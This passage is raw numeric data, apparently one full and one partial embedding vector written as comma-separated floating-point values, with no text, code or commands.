-0.0022381286,0.004782574,-0.0019373455,-0.0033236505,-0.003771247,0.026151802,0.010171989,-0.014644369,0.027205376,0.009421703,0.0057465257,0.027352763,0.019882005,0.010481594,0.024240827,-0.024752244,0.0074874363,0.010649764,-0.029561607,0.01902812,0.0012741343,-0.002534056,-0.015922636,0.00786571,0.024509318,-0.004802216,-0.008470212,0.021422366,0.02807632,0.0039425194,0.058557466,-0.016052723,-0.006724168,-0.010770853,-0.008172492,0.0017603865,-0.020420395,-0.013610794,-0.029020276,0.016909434,0.04279443,-0.0045206496,0.008604117,0.0020233556,0.013210275,0.039311647,-0.029812852,-0.0014526926,0.024169957,-0.0058550728,-0.004838908,-0.0069365706,-0.016010396,0.00630357,0.028185407,0.004591397,0.0065098456,-0.0048229597,0.018209795,-0.020680342,-0.01147496,0.015041811,0.0056161275,-0.024416253,-0.004059503,0.0016215162,0.009931703,-0.013580659,-0.005998659,0.0081669595,-0.006847251,-0.0011835076,-0.0009447281,0.0055937516,0.010106365,-0.0068519283,-0.0068877344,0.0030103489,0.0046714423,-0.0016963094,-0.010380865,-0.006266607,-0.02206398,0.016090991,-0.000649764,-0.013596854,0.017985012,0.0121413935,-0.0033805037,0.00027010986,-0.013920983,0.0060962755,0.0067493673,0.013139735,-0.0018538103,0.02310361,0.008682154,-0.011910833,0.0009624992,-0.013911097,0.0022139647,0.008099269,-0.00015853146,0.010827246,-0.010784611,0.0047050444,0.012085554,-0.0748628,0.017248796,0.018801773,-0.0039020656,0.007392991,0.036071848,0.015620632,-0.015868904,0.0067207785,-0.01397503,-0.0023260792,0.015916398,0.023417475,-0.0028437702,0.006033886,-0.014197845,-0.010872331,0.026141305,0.0037265548,-0.013616159,-0.03418453,0.01974867,0.0020873765,0.005248966,0.015911061,0.008750815,-0.008421044,-0.020712689,0.013888561,-0.0058301557,-0.02168002,0.013100471,-0.0019382635,0.0020097257,0.041230217,0.01421654,-0.016930252,-0.011193354,0.0123676555,-0.015228691,0.00052035897,0.015201034,0.012447691,-0.014470637,-0.012044785,0.014858977,0.012328923,-0.009630004,-0.02765843,0.012816731,0.006286891,-0.013747352,0.03711931,0.013507716,0.018356951,-0.033492208,-0.008552613,0.0034180204,0.018964188,-0.019519895,-0.0027543306,-0.013907282,-0.0024633193,0.020932926,0.006650977,0.018215844,0.004297177,0.02603522,0.016546749,0.03663535,0.024766413,0.026351355,0.00089623954,0.002279713,0.0051199463,0.02049815,0.032708965,-0.009176811,-0.011817947,-0.00838661,0.0029766106,-0.0061002006,0.0066794744,0.004624407,0.01404109,-0.0106344335,0.009744419,-0.018336326,-0.00868985,-0.018389586,-0.018163482,0.019873291,-0.0012101966,-0.0004022671,-0.027166642,-0.000081221435,0.0013099695,0.024054108,-0.0077302633,-0.0003102194,0.04179572,-0.0040391283,-0.0006920783,0.006002648,0.0027319577,0.012382783,-0.0040594726,-0.008833812,-0.013003477,-0.00030999712,0.016216576,0.0021947697,0.0044182627,-0.0029663253,0.0070588705,-0.013656082,-0.019694608,0.005158907,-0.004748258,0.014834109,-0.0072714146,-0.00077303866,0.011776537,0.011854532,-0.0017125278,0.010630994,0.0153131755,0.0037281676,-0.010162994,-0.00993597,-0.009453137,0.008405863,-0.012904548,-0.008771334,0.010251519,0.003766278,-0.021748096,-0.024990305,0.013208413,0.0030495431,-0.0010171481,0.004902578,-0.003665569,-0.0028865056,0.0010044471,-0.039055213,-0.013647302,-0.0103949215,-0.025257228,0.018341886,-0.012630963,-0.0019769364,0.02382642,0.018008668,0.033323895,-0.011831088,-0.0150386905,0.014492132,0.0021291808,-0.0012408483,-0.00037043606,0.024975605,-0.0058351415,0.017335603,0.034612384,-0.010611151,0.011554039,0.0008068827,0.012002409,0.0069810627,0.004838951,0.0040662945,0.014353509,-0.012451321,-0.00501981,0.016570825,0.010047925,0.000037405272,0.003190275,0.003471981,-0.014574171,-0.020559687,0.025380645,-0.023369664,-0.008760097,0.0016366168,-0.017316366,-0.0070011723,0.005155663,-0.01016362,-0.015747717,0.0061882376,-0.014388928,-0.0127591025,0.007822223,-0.021098172,0.0029232919,-0.01759433,0.018491657,-0.021535106,-0.023620183,-0.00094612583,-0.092314534,0.0006658351,0.015825858,0.022996668,0.062200274,0.0064472537,-0.014677379,-0.015211404,-0.012037237,0.0108849555,0.008719067,-0.013140108,-0.017190011,0.011430521,0.036336515,-0.005792386,-0.011920316,-0.0051789037,0.012814192,-0.026688289,-0.0038554117,0.00058220315,-0.023720942,0.003204186,0.014735722,-0.00340036,-0.0049551786,-0.0129750315,-0.011158511,0.0029057227,-0.010347592,-0.0039092964,-0.0009167941,-0.006192622,-0.008798537,0.00537127,-0.0044446965,0.016917827,-0.03924862,-0.033637855,0.0015338922,0.008422788,0.0039302404,-0.008138794,-0.026150418,0.011546965,-0.037871554,0.0044598244,-0.0010645157,0.007638022,-0.0056625297,0.004878204,0.004729273,0.02987584,-0.006630458,0.0008805169,-0.008511523,-0.013789356,0.020982148,0.00207961,-0.009931173,0.010981291,0.010685432,-0.0058654533,0.007608095,0.0071976143,0.009551712,0.016907858,-0.0021596071,0.0135888755,0.01387652,-0.03982261,-0.015295323,-0.029529676,-0.0023024702,0.0062570516,0.013585889,-0.0011738733,-0.012215676,0.0066830823,0.033342827,-0.00652429,0.021336298,0.007855226,0.016495299,0.020689525,0.001798605,0.0052615325,0.021168102,0.009468207,-0.025416547,-0.0064160647,0.018125996,0.004937708,0.019277865,-0.002118329,-0.005216483,0.005090474,-0.009163684,0.005667484,0.0040581287,0.0015684614,-0.006680345,-0.009610946,-0.0038901463,0.0147972535,0.007739132,-0.015569356,-0.012486576,-0.010827996,-0.009377869,0.026166905,0.011287828,0.03475007,0.013861618,0.013665683,-0.0007072315,0.013469784,-0.0062882067,-0.03406431,-0.009885111,0.0025701758,-0.013688353,0.031744704,0.02688721,0.005392762,0.017532142,-0.0137662,-0.013772174,0.015955126,0.0025404685,0.024326235,0.01418284,0.011157128,-0.016833782,-0.0029498613,-0.017485831,0.021016717,0.006929819,0.026071435,0.0029874388,-0.03986557,0.0007708293,0.005356448,-0.032265767,0.02809409,-0.021400213,0.0019454078,-0.010731082,-0.008534074,-0.00738607,0.0111074345,-0.008424429,0.004215632,-0.005182861,0.0008491517,0.008504447,-0.0012619512,-0.020496879,0.00153564,-0.009317703,0.010210257,-0.0069579463,-0.010433717,-0.016906485,0.001813608,0.0011027331,0.01048431,-0.0016435655,-0.00995305,-0.015374971,-0.0057482296,0.009415971,0.0064336937,-0.008683873,-0.0030046147,0.01603448,0.019249788,-0.0050833956,-0.009330404,-0.03547197,-0.008032773,-0.013409473,-0.03218019,-0.017056853,-0.011915933,0.004687416,-0.0067354073,0.019720362,0.0027288697,-0.019672737,-0.010193781,0.017641451,-0.016053373,-0.00089526584,-0.02182028,0.0013619878,0.001371027,-0.029661668,0.015473784,0.0006981879,0.020622006,-0.015741663,0.0068014353,0.039512217,0.0055036256,-0.005377547,0.026260568,-0.021085715,-0.0116922455,-0.01376515,0.013040415,0.009864933,0.13376838,0.0004398429,0.0028688684,0.0028803486,-0.00040567116,-0.015730958,0.012022674,0.0029056324,-0.0014320711,-0.00047503106,0.019741096,-0.013906378,0.018626489,0.0070613334,-0.007085782,0.032790538,0.011304926,-0.023943046,0.021417087,0.0030636806,0.009430983,-0.020003157,-0.0114181135,-0.040737513,-0.020099439,-0.077072285,0.040087894,0.031210069,0.0021465302,0.019219045,0.0062123234,-0.0023760335,-0.0038172654,0.015998205,-0.015776834,0.012502775,0.0013214698,-0.020017559,0.0013736592,-0.021272099,0.031552985,-0.004412369,-0.003627327,-0.008125309,-0.006480606,-0.010068213,0.012130946,-0.006438934,0.010211917,-0.014964972,-0.00036870787,-0.011190014,-0.0011883825,-0.0073716906,0.025278911,-0.014255073,-0.0070296703,0.0070594535,0.0055880114,-0.012519146,0.009144842,0.002320932,0.012822164,-0.0029931518,0.013178601,0.008065121,-0.0018553326,0.0000065774857,0.0042886464,-0.0092996,0.038130056,-0.007954912,-0.006413305,-0.007759095,-0.0068406174,0.0019059033,-0.007566795,-0.016206358,0.007232299,-0.0026990995,0.0060328064,-0.014214982,0.00007035807,-0.005377569,0.0011600542,0.00057324936,-0.007996049,0.017454226,-0.01780008,-0.0065885796,-0.027917445,0.023093065,0.022957062,0.010926906,-0.016303511,0.01089246,0.010146658,-0.014043526,-0.0126774935,0.012628274,-0.01501836,-0.0016589476,-0.013829497,0.007843893,-0.009671262,-0.013011375,-0.011549224,0.004147344,-0.0035790498,0.0060438174,0.0018383155,0.024111142,-0.0028120284,0.014556764,0.010932143,0.033801436,-0.027879817,-0.0026604345,0.011095113,-0.027372463,-0.0044583376,0.013034465,-0.004210788,0.030096391,0.012443971,0.010444695,-0.018976947,-0.00700791,-0.006339805,-0.010291425,-0.00006162089,-0.034052696,0.00954273,0.025078783,-0.008770635,0.018766643,0.03179407,-0.00004318276,0.007952486,0.00034223948,0.0005827362,-0.01655627,-0.006742831,-0.011233047,0.010812711,-0.024701227,0.0157889,-0.008014575,-0.0038374371,-0.007952886,0.0005525783,0.0080598295,-0.024139777,0.001337276,-0.0016634165,-0.013490897,0.0087079555,0.012996208,-0.013092194,-0.0155072,0.017821904,-0.006447945,-0.003091186,-0.046625443,0.020931179,0.02090299,-0.008187159,0.0048857266,-0.023493238,0.002523649,-0.0039791884,-0.0010808416,0.0010643076,-0.0061450643,-0.009692805,0.0063754595,-0.0004937432,0.015554614,-0.015507561,0.0052961484,0.011916548,-0.00012971056,0.013424247,-0.019137157,0.03703008,0.004602567,0.008316152,-0.012377687,-0.027717607,0.017599115,0.004749704,-0.008711287,-0.0022052564,0.0010435614,-0.023327563,0.01590075,-0.017721688,0.034808766,-0.026692647,-0.0293515,-0.008063046,0.011822369,0.015150443,-0.029310517,0.005298865,-0.005441525,0.0008814203,-0.01114058,-0.0013644544,-0.0015165884,0.016711101,0.00024198211,-0.01999815,-0.036047738,0.014780849,0.0034677938,-0.029170334,-0.027233452,-0.009124204,-0.0011312496,-0.0005298431,0.0031518138,0.006844773,-0.007875038,0.008304616,0.011107459,-0.0054847132,0.022322636,0.01692194,-0.033350494,-0.014355304,0.024337785,0.013171818,-0.0066637364,-0.011133771,0.014985885,0.030415434,0.016252723,0.0074257506,0.007725272,-0.024355361,0.0047299704,0.028327722,-0.008986184,-0.012010824,0.007116716,-0.020781334,-0.02164776,0.0054429667,-0.006714436,-0.041326325,-0.0044683414,-0.014761355,-0.015869644,-0.029844308,-0.009170785,-0.005454171,0.02115517,-0.001386741,-0.0012857022,0.014598899,0.0019645698,-0.0009159733,0.024073638,-0.007648059,-0.0076768957,0.0012148403,-0.011192581,-0.0023759385,0.002005991,-0.004917104,0.016516408,-0.00951785,0.029059732,0.024329897,0.012358535,-0.0073748603,-0.012560045,0.009050213,0.0040700533,0.010404716,-0.019381313,-0.010629254,-0.025277192,-0.003666941,0.008645781,-0.006822709,0.043608673,0.06147244,-0.059375066,-0.0110965045,0.008592663,0.006116063,-0.015904048,0.038241193,0.009970115,-0.018909821,-0.013966209,0.009411497,0.019897781,-0.0011547001,-0.05102885,-0.011866234,0.012635017,-0.0077139856,0.005361479,0.0076374216,-0.012522811,-0.009749474,0.0039404836,-0.00893007,0.00028796832,-0.003492035,-0.00739154,0.0036165323,-0.023265408,0.017008737,-0.012717575,0.009434871,0.02111697,0.014454127,-0.009852589,0.00042085742,0.021476598,-0.0016872054,0.028182926,0.0014521643,-0.022382397,-0.023923457,-0.005189151,0.0012272169,-0.004493772,0.0031698826,-0.0052636727,-0.019109774,0.012952319,-0.0036799603,0.14317718,-0.006952433,0.0065624556,0.017249675,0.00076566584,-0.010599798,0.0066403043,0.023832278,0.0037525557,0.0069313683,0.01577987,0.0035923985,0.007859144,0.020176064,-0.014929219,0.0019501693,0.008721909,0.13094257,-0.01125954,0.02239028,0.00828654,0.0065912823,0.007548265,0.010505218,0.008992045,-0.06632856,-0.003155138,-0.03796498,0.0012477776,0.008281762,-0.03838207,0.019268613,-0.0089541115,0.0016492027,-0.009291024,0.0028056104,-0.002857886,0.0017994704,-0.024141066,-0.017922254,0.025831265,-0.0043711746,-0.014174934,0.015256362,-0.011781292,0.011768131,-0.030304689,-0.0022614293,-0.0033916675,0.005555804,0.004308108,-0.005624803,0.0108348895,-0.014496936,0.009291409,0.025077851,0.0058937087,-0.0034690057,-0.020745995,0.009666278,-0.0114607075,0.007437004,-0.0125977,0.03168469,-0.018070715,-0.0016725557,-0.011724919,-0.0042260163,0.02275682,0.016747614,0.020449087,0.0070069665,-0.019255431,-0.0022403246,0.032920394,0.0054973424,0.0017424681,0.015508387,0.015043616,0.002789749,0.018581484,-0.0060392064,-0.011957896,0.012516097,0.026015071,0.008027897,0.009571953,0.006464504,0.031353224,-0.0059523564,0.0030965242,-0.000921175,-0.016965676,0.0033363607,0.009311923,0.026129803,0.004420693,0.0005003039,0.005111008,-0.011529648,-0.006622289,0.017302072,0.0022836917,-0.010284811,-0.0117654875,0.009745173,-0.008527945,-0.03296219,-0.00044843883,0.0057274364,0.009554883,0.0072800275,-0.013016514,0.026606888,0.0052758106,-0.0070840474,-0.013074394,-0.012352305,-0.019756177,0.016245645,0.002218904,-0.008304948,-0.0005106202,0.009372938,-0.022069747,0.0073719225,0.008509414,0.02919204,-0.0078897,-0.0039213486,-0.03393937,-0.009349543,0.007746892,0.05622375,0.00038316805,-0.012416907,0.01895367,-0.03792199,-0.021133685,-0.001336167,0.0033582256,0.0084524965,0.0035349566,0.022235349,0.014088599,0.00029360518,-0.002466026,-0.013189834],[0.015119918,0.0038579537,-0.018082827,-0.0032475477,0.00826198,-0.018790359,-0.0011779992,0.016129378,-0.016382167,-0.005516831,-0.01613414,0.010775335,-0.015076049,-0.015585721,-0.00642914,0.0038442353,0.002674538,0.0043243323,0.0017230028,-0.008741549,0.012727927,0.010005436,0.0059558027,-0.018847764,0.0006263347,0.007710261,-0.0055637164,0.002894881,-0.009756704,0.009356934,-0.008190889,0.019495454,0.009411228,-0.002460422,0.017004976,0.0064394358,0.0041193697,-0.01870465,-0.0025567883,-0.00002462436,-0.008535087,0.025443854,0.0075641754,0.019442275,-0.00016206545,-0.0014063211,-0.012859071,0.02757039,0.006614823,-0.0049025165,0.0071692634,0.004701922,-0.021697422,0.038405657,0.003971929,0.0150348395,-0.006936867,-0.041999552,0.01999894,-0.027790727,-0.0057252743,0.0033824928,-0.012072723,-0.00997178,0.03469763,-0.0069576656,0.010907045,0.0036233012,-0.02237253,-0.013852786,-0.0044474867,-0.024766453,0.015926857,0.003001954,0.021143109,0.018739402,-0.0013526418,-0.031020058,-0.006084566,0.008276555,0.016720222,0.005287038,-0.0053671305,-0.014469769,0.0044579,-0.0033851431,-0.015807847,-0.00385508,0.01868686,-0.02705871,-0.008518814,0.0015000167,0.0011125825,0.009404414,-0.01574317,0.005938673,-0.002079187,-0.0082221525,0.015219541,0.013677114,0.0051283566,-0.012048484,-0.026559692,0.007788189,0.015253171,-0.015511843,-0.010397281,0.0041979067,-0.0006351378,-0.035777234,0.0014946468,0.016382154,0.008323468,-0.0029030058,0.008444586,-0.02020656,0.012232714,0.0049779406,-0.002035026,-0.0009843501,-0.00075329386,0.026908122,0.017514497,0.001744623,-0.008504341,-0.0013922789,-0.0061238254,0.01826942,0.004829313,0.0013517756,-0.0072668917,0.01417974,-0.00948163,-0.012761154,0.006552645,0.008478089,0.004359123,-0.0027665088,-0.0056854435,0.009061359,0.011096773,0.0016672942,0.024727976,-0.0073350472,0.010981327,0.0303829,-0.01676055,0.0071329395,0.017922288,-0.008855011,0.014058943,0.0068638357,-0.016926177,-0.017149346,0.0069394824,0.026747538,0.0070477063,-0.002780956,-0.034917668,0.0011736815,0.001487893,0.016292138,-0.001733147,-0.009357245,-0.030391918,-0.028900255,-0.028378995,-0.0031990248,-0.0131014865,-0.007106439,0.037448063,0.015364703,0.01333263,0.0044823214,0.014408803,0.022024667,0.017743167,-0.025229547,0.0027420546,-0.0216459,-0.018057957,0.013524079,0.006499974,-0.0072301645,0.0028837502,0.021814013,0.007600803,-0.026735337,-0.02503201,-0.016798576,0.0018753307,-0.003363882,0.00025506277,-0.0053956127,-0.009763093,-0.020302078,0.003325881,0.092615604,-0.014323201,-0.0017993695,-0.016070647,-0.010163168,0.02883502,-0.010776927,0.0045452607,-0.0029370105,-0.028193198,0.008340147,0.015169245,-0.004984549,0.008702122,-0.00044518817,-0.0058287713,-0.0073522096,-0.007664312,-0.043282755,0.029680206,0.014311387,0.013437497,0.0144929355,-0.0006876154,-0.0024218129,-0.003752966,-0.023770105,-0.024886884,-0.006460629,-0.020110749,-0.009991121,-0.011479017,-0.014288909,0.018701693,0.0077922405,-0.010115228,-0.039487425,0.0071331915,-0.014145278,0.017150242,-0.0064417925,0.00905755,-0.0022634082,-0.004935379,0.0042137224,0.030946752,0.040863797,-0.015199032,0.0069402815,0.02257981,0.009934915,-0.02000225,0.013136438,-0.017293975,-0.020108895,0.0034526822,0.0023442365,-0.0014274113,-0.016158769,-0.0041428623,0.00986335,0.0065096053,0.0034755843,0.025951732,0.03193111,-0.011519417,0.0044297595,0.012990427,-0.006473429,0.010835259,-0.025596423,-0.009407441,-0.015538754,-0.012363651,0.00080026727,0.008488666,-0.0010209787,0.012477357,0.007954622,-0.0081867445,0.0047259233,0.008769548,0.029878536,0.00030700662,-0.005141172,-0.011615284,-0.01465365,-0.005449264,0.015548444,-0.005724835,0.009562186,0.012798306,0.0011196653,-0.015178705,0.015442762,0.023015235,-0.0007990033,-0.012208443,0.009971156,-0.018546468,-0.006914359,0.010577178,-0.0017004198,-0.023025762,-0.0029829508,0.014588948,-0.018310763,0.005926162,0.00878564,0.006725971,0.042204518,-0.009441825,0.018185275,-0.023563728,-0.009860556,-0.028147465,-0.0052707023,0.005200132,0.022995872,0.024479594,-0.01163294,0.012789813,-0.0028485693,0.021173963,-0.014462881,0.021927595,-0.043153632,-0.006497117,0.0065462464,0.03190048,-0.012595835,0.031028867,-0.016892646,-0.014860168,-0.011359538,0.03201535,0.02937466,-0.026985224,0.032658603,-0.019031445,0.026796684,0.016680686,0.0065988,-0.016225103,-0.029965483,-0.010777026,0.00739425,0.002831977,-0.0025662247,0.014890121,0.008779831,0.010765735,0.0072630746,0.025206214,-0.016367666,-0.026356809,-0.0030895618,-0.03720141,-0.01261171,-0.007912537,-0.005468855,0.021459915,-0.013588314,0.030002313,-0.0123262275,0.0014792639,-0.0067580906,0.07515091,-0.0048698764,-0.0012178943,0.016936168,-0.005546044,0.019609971,0.041793216,0.01291796,0.015815463,-0.0025650908,-0.0036952493,0.008732055,0.004593414,-0.0010867816,-0.016841162,0.021637833,-0.005524369,-0.016979638,-0.01751374,-0.0015493752,0.028228762,-0.009860695,0.003687543,0.011731034,0.0071671894,0.0080180615,0.00017493684,-0.010048751,0.0013847922,-0.022843089,-0.0008060139,-0.016096873,-0.0107193515,0.004154696,-0.04260599,0.01885832,0.024466569,0.00808616,-0.0048390343,-0.012007942,0.0061027976,-0.00013543453,-0.017687125,-0.031229163,-0.006165562,0.015797311,0.0068454817,-0.003732638,-0.033107437,0.020407634,0.007146792,0.008381639,-0.018118002,0.013635121,-0.004270799,0.02330736,-0.00047479928,-0.04590818,0.049005732,0.01877958,0.033767447,0.015988065,0.00044893767,0.0013066313,-0.033758905,0.0155683905,-0.006918377,-0.0075320574,0.0087763425,0.001878416,-0.00036447204,0.001983132,-0.013553543,0.012595668,-0.010487019,0.005646826,-0.0019947556,-0.009501704,0.005166628,0.008537651,0.005096357,0.019111423,0.018128397,-0.009790493,-0.008004919,-0.004319816,0.017149972,0.0089252945,-0.002073638,-0.0016749237,0.005598286,0.012864957,0.007927405,-0.0076902914,0.02829747,0.016115146,0.0055890502,0.012855273,-0.008942197,0.01843347,-0.0023960685,-0.009847852,0.009596832,-0.02892658,-0.015658302,0.0028216164,-0.0017499472,0.02138783,0.00008769379,0.023058701,-0.041086126,0.009791005,-0.0013723976,-0.034062725,0.015154442,-0.019644924,0.019590832,-0.019516809,-0.020195857,-0.030882573,0.025384633,0.016852787,-0.0039589545,-0.0015897247,0.010290525,0.022100769,-0.015722936,-0.012910745,0.014566729,0.039263673,-0.021182032,0.03555419,0.004744487,-0.024595398,0.008843667,-0.00974428,-0.014350044,-0.03878958,0.017368566,-0.0030797718,0.010749586,0.029643178,0.027548345,-0.00058600085,0.016857503,0.032919217,0.032018222,-0.005694307,-0.017829768,-0.011873154,-0.0009747094,0.0022775764,0.0065543368,-0.008409452,0.0040839403,0.0015158158,0.020818705,-0.013260706,-0.0017398511,0.008648258,0.026157534,-0.013414878,-0.005724239,0.005560523,-0.011580719,0.029441368,-0.0017476049,0.087469496,0.0015113575,-0.030079992,-0.0067359945,0.010101776,0.009275584,-0.006688212,0.021631971,-0.010030253,-0.0031568357,0.0078445375,0.028720345,0.011062201,0.023849707,-0.010011516,-0.0023050471,0.0040237904,0.0050479723,0.01750062,0.008134924,-0.011297962,-0.01645487,-0.01442668,-0.022968845,-0.005734335,0.010136294,0.00887271,0.01943936,-0.018999858,-0.02132152,-0.02576907,0.005114129,0.0032769202,-0.007103339,0.00056446966,0.008081258,0.028130025,-0.016229382,-0.00021273046,0.033539396,-0.014416533,-0.0048495787,0.004729838,0.0190743,0.013366517,-0.009723091,-0.00834223,0.022860182,0.004793659,-0.0128760915,0.00096630113,0.009928845,0.02299092,0.029315539,-0.01843126,-0.008584636,0.016947374,0.012480087,-0.03864677,0.0134741245,-0.021283267,0.0053596674,0.009137462,-0.0032803223,-0.0072515877,-0.021465033,-0.01021319,0.0040701646,-0.00650949,-0.028220363,0.00043399393,0.029257992,-0.006212908,-0.012389354,0.009876348,0.013346132,-0.011877652,-0.006213923,-0.0028268902,-0.022371612,0.007027866,0.01930184,-0.002485425,-0.025789933,0.00042871755,0.012436313,0.01115957,-0.010086495,0.010733643,-0.0055478713,-0.00440862,-0.011844255,0.0140937315,0.010254636,0.03224095,0.008897772,0.01394465,-0.019929335,-0.011563959,0.0004765494,-0.03148251,0.003401695,-0.019858146,0.015190056,-0.0058445996,-0.0107375,-0.012860643,-0.0151750725,-0.0049034925,-0.02636885,0.0052143806,-0.041656725,-0.008870023,0.012321705,0.01952028,-0.002987458,0.024298651,0.014643166,0.0031852052,0.010918247,-0.0045119836,-0.018295918,0.0054101394,-0.009768788,0.010622869,0.010491475,0.0029721432,-0.026112402,-0.020218927,-0.012522894,-0.045343988,-0.012259415,0.044100165,-0.0022789089,0.003118097,0.019306008,-0.005739058,-0.0026402401,-0.0040025553,0.0042009363,-0.04749769,0.0063309516,0.0022642529,-0.015254586,0.0008679831,0.026333189,0.009069778,-0.0093442695,-0.03476918,0.010061468,0.0050093806,0.013334173,-0.019808404,-0.016049445,0.0003835201,-0.016216071,0.021546088,0.0020864443,0.020747839,0.0071126525,0.0187174,0.006223899,0.0024310278,0.010336118,0.013410395,-0.0052224924,0.011182079,0.009003655,0.0053138346,-0.0058593433,0.011098853,0.005702999,0.009136622,-0.0011179729,-0.01670206,0.0033879038,0.024655202,0.02026995,-0.002901237,-0.008069649,-0.007802876,0.022453774,0.02046388,-0.0018950063,-0.019658003,0.021385917,0.007455235,0.0002500565,0.02595969,0.0105868215,0.017156191,0.009002391,-0.019095456,-0.021445276,0.035177913,0.029706098,0.008733923,-0.0021084144,-0.0012947924,-0.009242912,-0.016620407,0.0025561948,-0.00470005,-0.019529756,-0.010029346,0.013502463,-0.024776421,0.00075211696,-0.025807576,-0.0051311585,0.023929538,0.015727548,-0.006111442,-0.0032223212,-0.019325987,0.008594857,-0.02497505,-0.03773089,-0.027564755,-0.0021952158,0.019780042,-0.021835065,-0.011025929,0.0132762715,-0.035479438,0.0015586256,0.003432394,-0.020907085,0.00027369137,-0.0015574526,0.002208395,0.0044238567,0.012005543,0.04014558,0.0092733,-0.030410465,-0.0016697666,-0.005701883,-0.005482975,-0.010418768,0.017322155,0.0036892418,0.01634758,-0.011117579,0.00005553753,-0.012567404,-0.023340166,0.0007889303,-0.039320726,-0.0062875287,0.020358074,0.029414525,0.022623016,0.01368947,-0.013532337,0.034517694,0.031446654,-0.010647205,0.0022181123,-0.025551105,0.02061672,0.028453883,0.019435642,-0.017578429,-0.033675473,-0.011542221,0.009573446,-0.025297409,0.0013749852,0.016208386,-0.023794066,-0.029102616,-0.011544423,-0.0038324078,-0.026863748,0.010438719,0.017725287,-0.016355552,0.033456825,-0.009917725,0.009571341,0.017189775,-0.010625106,0.0023081752,0.0050221803,0.011225952,-0.026213162,-0.012958302,0.010376646,-0.0056584193,0.022857266,0.0024081096,-0.03707087,-0.021877691,-0.02141748,-0.007254709,-0.014761941,0.024637373,0.011747146,-0.011985031,-0.016332434,-0.0047971965,-0.0042831637,-0.0020202508,-0.027499916,-0.022956604,-0.0023006152,0.0024423748,0.009054714,0.0059935036,-0.016485801,0.032247357,0.0013498188,0.007909263,0.013271057,0.008771758,0.0057748086,-0.0067385035,0.0055894204,-0.0045811646,-0.034715846,0.039554983,-0.02574099,0.0097736595,0.016072365,0.008387353,0.009386837,-0.02283854,-0.022439182,-0.0134662455,-0.004902217,0.0087294495,-0.010566325,0.018088195,-0.01710776,-0.010266271,0.017441796,-0.018752713,0.033993468,-0.0019469047,0.014395699,0.020014912,0.0005654179,-0.028415052,-0.018008355,0.014967149,-0.0019116969,0.0070563187,0.0022973323,-0.0077920337,0.03947097,0.023523767,-0.012142654,0.012342271,0.013911211,-0.007982248,0.001150774,0.0033015765,-0.019421529,-0.008162071,-0.0044405255,0.019677492,-0.012135607,-0.013897362,0.008723657,0.007643054,0.0042708027,-0.026360253,-0.007841051,0.008733432,0.011909219,0.017205574,-0.009685008,0.0016588885,-0.014917068,0.02352727,-0.02023698,0.020750204,0.012196293,-0.0074175647,-0.0029785645,0.006668986,-0.009297062,-0.00013443267,0.009860647,0.004393945,0.014511665,0.008207901,0.012603105,0.01706406,0.000050653576,-0.016789509,0.028447257,-0.010323821,-0.02004709,-0.0019570547,-0.019153224,0.001065013,0.013408662,-0.0045743454,0.006131313,-0.020898499,-0.006803537,0.011555437,0.0020186307,-0.0149138225,-0.0125888875,-0.0606127,0.03075509,-0.0044504493,-0.011067442,0.0020933177,0.003303025,-0.002996036,0.013521865,0.032250315,-0.0028753332,0.010527992,0.016396817,0.009876023,-0.0027537746,0.010274622,0.0016826999,-0.03269861,0.01688592,0.01656292,0.00815279,-0.00013502524,-0.0067561422,0.0011002568,-0.007448773,0.03628442,0.0008767012,-0.016674867,-0.026239973,-0.02570467,0.027907113,0.012948036,0.02710785,-0.0048210123,-0.020635284,-0.031017013,-0.03263561,0.00004617119,0.023169706,-0.0073340153,0.010068261,-0.010262484,-0.02739569,-0.0025862984,0.026536115,-0.00856356,-0.030945988,-0.0036507228,-0.010779057,-0.007249135,-0.025137354,0.017050272,0.003012145,0.002454847,0.025102133,0.0013911026,0.013087664,0.008210173,0.016973495,0.03191946,0.002776727,0.014684108,0.0071603167,0.008363408,0.006038292,-0.033697616,-0.0058673746,0.009890607,0.025351433,-0.016983004,-0.012922212,-0.008480721,-0.0168889,-0.019051438,-0.0021364144,-0.026737787,0.0155759435,-0.010721184,-0.012105384,-0.005017989,-0.005260526,-0.026577098,0.031061543,-0.01867387,0.008895055,-0.03328381,-0.008200311,0.034437098,0.017891832,0.006080208,-0.016330848,0.0012928927,0.0043359417,-0.007535163,0.015410016,-0.0060801837,0.014475687,0.012916973,-0.003268235,-0.0045122565,0.0032899973,0.02019056,-0.010794534,-0.011831908,0.046502404,0.0077795386,0.00056802994,0.028839078,0.027708828,0.032116946,0.016851407,0.01147659,0.009626222,0.0042242147,0.025871132,0.026119314,0.005085816,-0.03143434,0.0007819201,0.009765233,0.024593353,0.0027957368,0.010839636,0.021182572,-0.0038727357,0.010218676,0.0035146556,0.014953139,-0.008838609,-0.014651515,0.006360522,-0.016409518,0.021170877,0.015564998,-0.020498613,0.003952114,-0.017048404,0.0062063904,-0.013271625,-0.02833838,0.011172157,-0.027722187,0.00041733874,0.005300031,-0.020794488,-0.017561307,-0.004794825,-0.0005351312,0.023530118,0.0037869907,0.0025786676,0.008160596,0.0054742154,0.0054369345,-0.0068948017,-0.0059459563,-0.0077832025,-0.018498948,-0.018721502,0.023150494,0.011327177,0.0037201603,-0.026519341,0.0023039803,0.005596355,-0.028652646,-0.01318576,0.0012242408,0.006097572,-0.01802449,0.002780116,0.0119772805,0.016390895,-0.0180947,0.028601231,0.011618029,-0.027066808,0.011189048,0.014195295,0.006614138,0.0121191405,0.0076029855,0.035094004,0.012474417,-0.0048364727,0.011500784,-0.020766346,-0.014627231,0.012611043,-0.017502442,0.0037543306,-0.015750494,-0.0052038934,0.009033821,0.009300329,-0.008967106,0.05452363,-0.0082157,0.034496456,-0.0008486445,-0.010516208,-0.004509247,0.01620368,0.0074477526,0.028248616,-0.0154855065,0.008547804,0.01933191,-0.040902577,0.0019427065,-0.028726814,-0.0019687046,0.0019232095,0.0018167392,-0.006128558,-0.0060633887,0.0066963998,-0.0036445814,0.011741747,0.017966937,-0.0053229905,0.028640606,0.0061813756,-0.0029009292,0.013844615,0.01972187,-0.01016992,0.006245086,0.0030147126,-0.0029354985,-0.0003499743,0.0026198397,-0.004048386,0.019764256,0.038655672,-0.029639011,-0.0010670889,-0.001543581,0.012610777,-0.018402833,-0.019717023,0.021456726,0.011176456,0.011174718,0.002193507,-0.016299237,0.027429579,-0.0050288993,-0.0036716312,-0.01844563,0.0154901855,-0.00015954011,0.016140971,0.011083707,0.012047458,-0.014293386,0.013985988,-0.024202108,-0.013491057,-0.011908447,-0.004821778,-0.00010317269,0.0019674113,-0.012546045,-0.016909508,0.005044911,0.000932047,0.00077422423,0.0020735934,0.03609694,0.014213374,-0.009420589,0.013040343,0.00370